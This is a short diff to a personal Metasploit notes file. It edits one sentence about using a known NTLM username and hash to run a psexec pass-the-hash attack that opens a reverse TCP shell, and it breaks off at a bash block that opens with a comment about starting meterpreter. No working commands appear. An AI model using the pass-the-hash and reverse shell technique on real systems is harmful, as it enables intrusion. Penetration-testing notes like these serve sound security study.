AntonioFeijaoUK/www-cyberantonio-com/docs/notes/msfconsole/msfconsole.md

 <https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/>

-assuming you already have the NTLM `username:ntlm-hash`, you can then run the reverse tcp shell
+assuming that you already have the NTLM `username:ntlm-hash`, you can then run the reverse tcp shell

 ```bash
 # start metasploit meterpreter